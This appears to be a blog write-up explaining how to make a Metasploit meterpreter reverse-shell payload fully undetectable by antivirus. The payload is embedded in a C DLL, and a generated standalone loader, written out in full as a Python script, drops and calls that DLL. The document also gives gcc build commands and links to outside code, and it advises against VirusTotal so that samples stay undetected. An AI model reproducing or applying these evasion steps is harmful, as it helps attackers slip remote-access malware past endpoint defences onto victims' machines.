How I found a way to evade all antivirus products

Hello readers!
These days I have been interested in AV evasion and I have learned a lot about how antivirus software works; here I will write about my technique to evade every AV product.
Many people using Windows think that an antivirus can stop any threat and that with an AV installed their computer is secure. This idea is false: new malware that no antivirus detects is written every day.


How does an antivirus work?

An AV has two scanning techniques:

– Static analysis, also called 'signature-based analysis': the antivirus compares the potential threat against its database of signatures of known malware (cryptographic hashes such as MD5/SHA-1 of whole files, and byte patterns extracted from known samples). If the scanned program matches a known signature, it is moved to the AV's quarantine.

– Dynamic analysis, also called 'runtime analysis' or 'behavioural analysis': once the program is executed, if it was not caught by a signature, the antivirus monitors what it does and tries to detect malicious actions, such as decrypting a payload in memory, among many others.

Another type of protection is the AV sandbox: when the user suspects a file to be malware, it can be launched in the AV sandbox, without network access and with restricted resources. Somewhat like a Docker container on Linux, the sandbox can run a file without 'infecting' the real system.

What do you need to follow this write-up?

– A main OS with the Metasploit framework installed.
– A Windows virtual machine with an antivirus installed (mine is Kaspersky Free 2016), MinGW with gcc.exe, and Python 2.7.
In this write-up I will use Metasploit payloads as the test executables to evade AV.

Msfvenom

Msfvenom is the payload generator of the Metasploit framework. Payloads generated by msfvenom are standalone and quite good for pentesting, but they are detected by most AV products (see the results from an online AV scanner for a simple meterpreter reverse-shell payload).

[Screenshot 2018-01-03 15:25:41]

My idea about antivirus evasion

I have tried many techniques to obtain a FUD executable, but none of them worked:

– Writing a Metasploit payload encoder in Ruby to obfuscate the malicious code of the payload. After some research I realised that the purpose of an MSF encoder is to avoid bad characters like \x00, not to evade AV software.
– Generating the payload in an interpreted language (.py, .vbs, .pl) and then compiling it into an executable.

Finally, I had a great idea: since Metasploit has Python meterpreter payloads, I wanted to embed the Python payload in a C program using the Python development headers (Python.h) and then compile it into a Windows executable. With this technique I got 1/37 on the NoDistribute online scanner.
I wanted a fully undetectable result, so I tried to create a malicious dynamic library with the Python payload embedded, and finally got a fully undetectable payload 🙂 [Screenshot 2018-01-05 21:34:44]

We can check the exported functions of the malicious dynamic library I created! [Screenshot 2018-01-05 22:51:49]

We run the malicious function of the DLL!

[Screenshot 2018-01-05 22:58:38]

And BOOM, we get a meterpreter session on our side 🙂!
[Screenshot 2018-01-05 23:02:47]

How to create a DLL with the Python payload embedded?

You can get the C source code of the DLL here: https://pastebin.com/Q5ipn81s . To compile the DLL you need the Python development headers, and also libpython27.a, the library that links the Python interpreter into the DLL (note that in a standard MinGW/Python 2.7 setup this is an import library for python27.dll, so Python 2.7 must also be present on the machine that runs the DLL): http://www58.zippyshare.com/v/pzoNUkGd/file.html . Move it to C:\Python27\libs\ .

Compilation:

gcc.exe malicious_dll.c -IC:\Python27\include -LC:\Python27\libs -lpython27 -shared -o payload.dll

-shared = tells gcc that the output is a dynamic library
-I = tells gcc where Python.h is located
-o = the output file
-L = tells gcc where the Python interpreter library is located
-l = the name of the interpreter library (libpython27.a, given without the lib prefix and the .a suffix)

Portability problem

We have our malicious dynamic library, but the problem is how to distribute it during a pentest: we would need a .bat file or an .exe to call the malicious DLL, so how can we distribute the two files?

To solve the problem, I created a Python program that hardcodes the bytes of the DLL in a character variable, writes them to a new DLL file and then calls the DLL's function, so the payload becomes standalone: https://github.com/Hadi999/MyTools/blob/master/bypass-av.py

[Screenshot 2018-01-06 15:09:25]

In our case we need to call the function 'payload' of payload.dll, so the command is:
python bypass-av.py --library=payload.dll --function=payload --output=standalone_payload.c

We compile it on our Windows machine:
gcc.exe standalone_payload.c -o standalone_payload.exe

[Screenshot 2018-01-06 16:25:40]
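As an added example of the wrapping step (my own Python 3 script, not the author's bypass-av.py, although the command-line flags mirror it), the following generator embeds the bytes of any DLL in a C array and emits a loader that writes the DLL to the temporary directory, loads it with LoadLibraryA, resolves the requested export with GetProcAddress and calls it. The temp-file location, the use of GetTempFileNameA and the DLL_DATA name are assumptions of this example; the sample input in the test is a constructed byte string, not a real DLL.

```python
#!/usr/bin/env python3
"""Embed a DLL in a self-contained C loader (added example, not bypass-av.py).

    python make_loader.py --library=payload.dll --function=payload --output=standalone_payload.c
    gcc.exe standalone_payload.c -o standalone_payload.exe      (on the Windows VM)
"""
import argparse
import re

# C side: the DLL bytes are dropped to %TEMP% and one export is called.
LOADER_TEMPLATE = r'''/* generated loader: drops the embedded DLL to %%TEMP%% and calls one export */
#include <windows.h>
#include <stdio.h>

static const unsigned char DLL_DATA[%(size)d] = {
%(bytes)s
};

typedef void (*entry_fn)(void);

int main(void)
{
    char dir[MAX_PATH], path[MAX_PATH];
    if (!GetTempPathA(sizeof dir, dir) || !GetTempFileNameA(dir, "tmp", 0, path))
        return 1;
    FILE *f = fopen(path, "wb");
    if (!f || fwrite(DLL_DATA, 1, sizeof DLL_DATA, f) != sizeof DLL_DATA) {
        if (f) fclose(f);
        return 1;
    }
    fclose(f);

    HMODULE lib = LoadLibraryA(path);          /* any extension is fine here */
    if (!lib) return 1;
    entry_fn fn = (entry_fn)GetProcAddress(lib, "%(function)s");
    if (!fn) return 1;
    fn();                                      /* runs the exported "%(function)s" */
    FreeLibrary(lib);
    DeleteFileA(path);                         /* the file was on disk while it ran */
    return 0;
}
'''


def bytes_to_c_array(data: bytes, per_line: int = 16) -> str:
    """Render bytes as 0x.. initializers, per_line per row."""
    rows = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        rows.append("    " + ", ".join("0x%02x" % b for b in chunk) + ",")
    return "\n".join(rows)


def c_array_to_bytes(text: str) -> bytes:
    """Inverse of bytes_to_c_array, used to check that the embedding round-trips."""
    return bytes(int(h, 16) for h in re.findall(r"0x([0-9a-fA-F]{2})", text))


def make_loader_source(dll: bytes, function: str) -> str:
    # The export name lands inside C source: insist on a plain identifier.
    if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", function):
        raise ValueError("export name must be a C identifier: %r" % function)
    # Cheap sanity check that the input is a PE file, not e.g. the .c source.
    if dll[:2] != b"MZ":
        raise ValueError("input does not start with an MZ header; not a PE file")
    return LOADER_TEMPLATE % {
        "size": len(dll),
        "bytes": bytes_to_c_array(dll),
        "function": function,
    }


def main():
    ap = argparse.ArgumentParser(description="wrap a DLL in a standalone C loader")
    ap.add_argument("--library", required=True, help="DLL to embed")
    ap.add_argument("--function", default="payload", help="export to call")
    ap.add_argument("--output", default="standalone_payload.c")
    args = ap.parse_args()
    with open(args.library, "rb") as f:
        dll = f.read()
    with open(args.output, "w") as f:
        f.write(make_loader_source(dll, args.function))
    print("embedded %d bytes of %s into %s" % (len(dll), args.library, args.output))


if __name__ == "__main__":
    main()
```

Because the loader writes the DLL out as a real file before loading it, the dropped file is exactly what an on-access scanner gets to inspect; the array in the .exe is just the same bytes at rest, which is why this wrapping does not by itself change what the scanner sees once the program runs.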

Arghhh, 1/38 for our standalone executable, but the only AV that detects it is ClamAV, which is a Unix antivirus: our payload is for Windows, so our executable is fully undetectable!!! If you want 0/37 you can distribute only the malicious DLL and a batch file that calls it. That's the end of the article, I hope you liked it 🙂

Note: please do not scan the samples with online scanners like VirusTotal, because they share the samples with AV vendors and our payload will not be FUD anymore.
